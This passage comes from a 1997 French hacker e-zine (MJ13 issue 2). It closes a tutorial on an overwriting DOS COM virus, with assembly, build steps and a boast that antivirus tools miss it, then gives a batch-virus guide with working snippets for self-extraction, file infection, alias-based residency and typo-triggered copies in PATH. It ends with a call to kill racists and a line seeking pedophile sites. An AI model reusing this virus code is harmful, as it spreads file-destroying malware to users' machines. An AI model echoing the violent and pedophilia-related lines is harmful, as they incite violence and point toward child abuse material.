octets)) , pour ma part j'y ai mis une valeur fictive que j'ai remplacé
une fois compilé , et j'ai ensuite recompiler avec B000h , a noter que
MTEST contient les deux premiers octets du fichier 
Oui mais si un fichier a déja 00B0H comme premiers octets? Les chances restantes 
sont de 1/65535 , c'est a dire que l'on ne s'en inquiete pas , si le test 
parait positif , il vas a close

-
JZ CLOSE
MOV AX,4200H
MOV CX,00
MOV DX,00
INT 21H
-

repositionnement du pointeur au début du fichier ( 42H )

-
MOV AH,40H
MOV CX,84                       ; taille du prog
MOV DX,OFFSET START
INT 21H
-

ici écriture de tous les octets depui start sur le fichier

-

BYE: RET

-
informations utiles au programme
-

COMFILE:	DB 'coui*.com',0
MTEST:		DW ?

main            endp
code            ends
                end     main

****************************************************************************

j'éspère que vous aurez compris les mécanismes de ce virus très petit
a cause de sa simplicité  , pour le compiler faites tasm mj13.asm puis
tlink mj13.obj , amusez vous a refaire ou améliorez ce virus 

Je garanti qu'a la sortie de cet article de MJ13 , ce virus n'est pas reconnu
par les anti-virus

NB : la version MJ13 n'infecte que les coui*.com tandis que la 0B infecte
tous les fichiers com 

Prochain épisode : ca se transforme en infecteur COM

*** Envoyez vos questions ou mes bugs a Zorohack@hotmail.com 

Spécial thanks a chico , si vous avez rien a faire allez voir les articles
de phalcon/skism et d'autres sur jesaisquellepage (:Alta vista ca existe non?

							     By -¦ UnKM ¦-
 							   Thanks to Samson

^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^°²;,.,;²°^

******************************************************************************
------------------------------------------------------------------------------
----  VIRUS BATCHS  -  Un peu d'originalité coté virus                    ----
------------------------------------------------------------------------------

    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
   *  * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  *
  * *  DISCLAMER: Vous ètes seul responsable de l'utilisation de ce   * *
  * *  document, et son auteur n'est en aucun cas responsable d'une   * *
  * *  mauvaise utilisation par autrui.L'ecriture de ce texte n'est   * *
  * *  pas illégale  en France mais  la création  de virus du  type   * *
  * *  decrit  l'est.  Les virus (éventuellement)  fournis  avec ce   * *
  * *  logiciel ne sont là qu'à but de démonstration, et ne doivent   * *
  * *  pas être utilisés.                                             * *
   *  * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *  * 
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * 

WARNING: Nécessite une BONNE connaissance du batch et du DOS.

NOTE: Mon but n'est pas vraiment de decrire comment créer un virus batch
fonctionnel (pour ça lisez les fichiers C-WORM.TXT, V-WORM.TXT, VIRAL.TXT)
mais plutôt de vous donner des conseils généraux et d'expliquer certains
passages ardus de cette programmation.

+-----------------+
¦ 1/ iNTRODUCTION ¦
+-----------------+
  C'est vrai ça, il existe des milliers de virus EXE et COM, mais des virus
  batchs (BAT) il en existe une vingtaine au grand maximum.  Pourquoi?  Ils 
  sont certes lents, pas TSR, gros, et il existe peu de fichiers BAT sur un 
  même ordinateur.  Cependant presque aucun anti-virus ne peut détecter les 
  virus batchs, ce qui supprime d'un coup tout besoin de moteur de cryptage 
  et de routines d'anti-debugger.
  
  De plus avec un bon niveau et de l'expérience (beaucoup) ont peu faire des
  choses grandioses: à votre avis un virus batch peut-il:
       1) Etre résident?
       2) Infecter des fichiers EXE et/ou COM?
       3) Profiter des fautes de frappe pour s'activer?
       4) Se dissimuler d'Edit et de DIR?
       5) Détecter 4DOS et réagir en l'exploitant?
       6) Etre un infecteur rapide?

  La réponse est OUI pour toutes ces questions, et j'affirme que seul un
  utilisateur avancé peut les detecter si SmartDrv (ou autre) est en mémoire.

+-------------------------+
¦ 2/ TECHNIQUES GENERALES ¦
+-------------------------+
  En ce qui concerne leur programmation proprement dite il faut avant toute 
  chose pour discerner le virus du code il faut rajouter une chaine de 
  caractères identique à toutes les lignes du virus pour le différencier du 
  programme infecté. Exemple:
      +----------------------------------------+
      ¦ @Echo off %Virus%                      ¦ <- Début du virus
      ¦ ... %Virus%                            ¦
      ¦ 'instructions du virus' %Virus%        ¦
      ¦ goto EndVirus                          ¦ <- ici la chaine est Virus
      ¦                                        ¦
      ¦ :EndVirus                              ¦ <- Fin du virus
      ¦ @Echo off                              ¦ <- Début du programme
      ¦ cls                                    ¦
      ¦ echo Programme infecté                 ¦
      +----------------------------------------+
  Pour extraire le virus seulement dans un fichier il suffira de taper
      +----------------------------------------+
      ¦ TYPE %0.BAT | Find "Virus" >NewVir.bat ¦
      +----------------------------------------+
  %0.BAT représente le nom du fichier qui vient d'etre lancé, sous 4DOS 
  %0.BAT peut être une erreur et %0 le bon il faut donc déterminer lequel
  employer:
      +----------------------------------------+
      ¦ SET Good=%0                            ¦
      ¦ If exist %0.BAT Set Good=%0.BAT        ¦
      ¦ If exist %0 Set Good=%0                ¦
      +----------------------------------------+
  et ensuite seulement:
      +----------------------------------------+
      ¦ TYPE %Good% | Find "Virus" >NewVir.bat ¦
      +----------------------------------------+

  Pour infecter un fichier il ne vous restera qu'à taper:
      +----------------------------------------+
      ¦ Ren file.bat file.old                  ¦ Le virus sera placé AVANT le
      ¦ Copy Newvir.bat + file.old  file.bat   ¦ programme.
      ¦ Del file.old                           ¦
      +----------------------------------------+
  Ou encore en employant une structure légèrement différente, vous pouvez 
  rendre le code plus court et plus rapide.
      +----------------------------------------+
      ¦ Type Newvir.bat|find "Virus">>file.bat ¦ Le virus sera placé APRES le
      ¦                                        ¦ Programme
      +----------------------------------------+

  Cependant il vous faudra d'abord détecter si le fichier que vous visez est 
  déjà infecté ou non. Pour celà vous devez générer un code du type suivant 
  qui créera un fichier $VIRUS.BAT
 +------------------------------------------+
 ¦ echo :virus >$Virus.BAT                  ¦ 
 ¦ echo find "Virus" %%1 >>$Virus.bat       ¦<- Recherche chaine de caractères
 ¦ echo If errorlevel 1 goto Y >>$Virus.Bat ¦<- Si trouvé alors aller en Y
 ¦ echo goto end >>$Virus.bat               ¦<- Sinon quitter
 ¦ echo :Y >>$Virus.bat                     ¦
 ¦ echo Set  ok=%%1 >>$Virus.bat            ¦<- Variable OK=Nom_du_fichier.bat
 ¦ echo :End >>$Virus.bat                   ¦
 +------------------------------------------+
  Et ensuite appeler le fichier ainsi créé de la manière suivante.
 +------------------------------------------+
 ¦ For %%a in (*.bat) do call $Virus %%a    ¦<- Boucle pour détecter fichier
 ¦ If (%ok%)==() goto Virusend              ¦<- Pas de fichier, quitter
 ¦ ... 'code d'infection' ...               ¦
 +------------------------------------------+
  C'est tout pour les techniques générales, à vous de broder autour et de 
  recoller les morceaux de code dans le bon ordre :).

+-------------+
¦ 3/ ROUTINES ¦
+-------------+
  Passons maintenant à des routines plus complexes:
  Un virus batch peut être résident, mais pas de la manière ou on l'entend
  habituellement. En utilisant DOSKEY (command.com) ou ALIAS (4dos.com) vous
  pouvez réaffecter des commandes comme DIR par exemple. En supposant qu'un
  appel à DIR lance votre virus imaginez les dégats. Avec l'alias de 4DOS 
  c'est totalement transparent, la command ALIAS DIR=`c:\virus.bat^*DIR` vous 
  décharge de l'émulation du DIR par votre virus.

  Mais du coup un problème se pose: comment détecter 4DOS? simple il suffit
  de rajouter un code du style
      +----------------------------------------+
      ¦  @Echo Off                             ¦
      ¦  If (%@eval[1+1])==(2) goto 4DOSFound  ¦
      ¦  ...                                   ¦
      ¦  'instructions virus pour command.com' ¦
      ¦  ...                                   ¦
      ¦  Goto EndVirus                         ¦
      ¦  :4DOSFound                            ¦
      ¦  ...                                   ¦
      ¦  'instructions virus pour 4DOS.COM'    ¦
      ¦  ...                                   ¦
      ¦  :EndVirus                             ¦
      ¦  'debut de programme infecté'          ¦
      +----------------------------------------+
  Simple, non?

  Une procédure trés simple permet d'activer votre virus batch lors des fautes
  de frappe. En effet sous DOS on remarque un certain nombre de fautes 
  classiques telles que DIOR DUR DOR pour DIR, DEM pour DEL, EDIOT pour Edit,
  etc...
  Pour celà il suffit d'extraire le code du virus et de le copier sous ces
  différents noms dans un répertoire du PATH (c:\dos par exemple), donnant:
   +------------------------------------------------------------------------+
   ¦ SET Virus=%0                                                           ¦
   ¦ If exist %0.BAT Set Virus=%0.BAT                                       ¦
   ¦ If exist %0 Set Virus=%0                                               ¦
   ¦ For %%a in (dior xcopu dem) do TYPE %Virus%|Find "Virus" >c:\dos\%%a.* ¦
   +------------------------------------------------------------------------+
  (à vous d'alonger la liste)

  Pour infecter les fichiers EXE et COM votre virus doit être compagnon, c-a-d
  ayant le même nom que le fichier infecté. Je vous conseille de lire la FAQ
  normalement dans ce E-Zine sur le moteur [C-WORM Engine v2.0].
  Pour des détails sur l'infection rapide, les modules résidents et Stealth,
  consultez les FAQs sur les moteurs [ViRAL-BATCH Engine v2.0] et 
  [V-WORM Engine v2.0Ó].

+--------------+
¦ 4/ ANTIVIRUS ¦
+--------------+
  Il n'existe en réalité qu'un seul anti-virus batch performant, il les 
  detecte de manière heuristique et scanning, il dispose aussi d'un module
  résidant pour tenter de stopper des monstres du style 'BE-Happy!' ou 'm0o0m'
  c'est BATCH ANTI-VIRUS v4.33 dont je suis l'auteur. L'interface est assez 
  rudimentaire mais efficace.
  Certains antivirus commerciaux style TBAV (je crois) détectent quelques
  vieux virus mais rien de bien efficace.

+---------------+
¦ 5/ REFERENCES ¦
+---------------+
  Voici la courte liste des textes dit de référence en matière de virus 
  batchs:
   C-WORM    TXT  -  Documentation sur le moteur compagnon C-WoRM v2.00
   V-WORM    TXT  -  Documentation sur le moteur V-WoRM v2.00 Ólpha (inachevé)
   VIRAL     TXT  -  Documentation sur le moteur ViRAL-BATCH v2.00
   BAT_MUF   TXT  -  BATCH Microsoft Undocumented "Features"
   BFVWG     TXT  -  FAQ sur les virus batchs (anciens)


+---------------------------------+
¦ 6/ CONSPiRACY oF DaRKNESS [CoD] ¦
+---------------------------------+
  Si vous ne respectez pas l'un des termes suivants alors n'utilisez pas 
  ce document et allez bruler en Enfer.
  1/ L'utilisation/création des virus pour la destruction d'une machine
  appartenant à une tiers personne est condamnée par [CoD] et par tous les
  créateurs responsables.
  2/ Il est interdit de modifier ce document, en cas de doute envoyez une
  copie du document au groupe en indiquant ôu vous l'avez trouvé.
  3/ FUCK RACISM & KILL RACISTS, il existe des idéaux pour lesquels il faut 
  encore être prêt à tuer/mourir (si Gros Blond gagnait les élections 
  présidentielles par exemple).

--                                                                       --
Voilà je crois que c'est tout pour cette fois. Je sais que ce texte peut ne 
pas sembler trés clair de prime abord, mais il contient un complément 
indispensable aux trois fichiers C-WORM.TXT, V-WORM.TXT, VIRAL.TXT.
--                                                                       --

                                                        DaRK BiRD / CoD
                                                  Ecrit pour le groupe MJ13

******************************************************************************
Et voila... qui cloture l'issue #2.0
on va essayer d'etre plus speed pour la 3.
Pour contacter un menbre: alli427@hotmail.com
le courrier le concernant lui sera retransmis.
et n'oublions pas, nous recherchons des sites de fascisme & pedodophile.

                                             ALLIGATOR427 / MJ13
                                             03/1997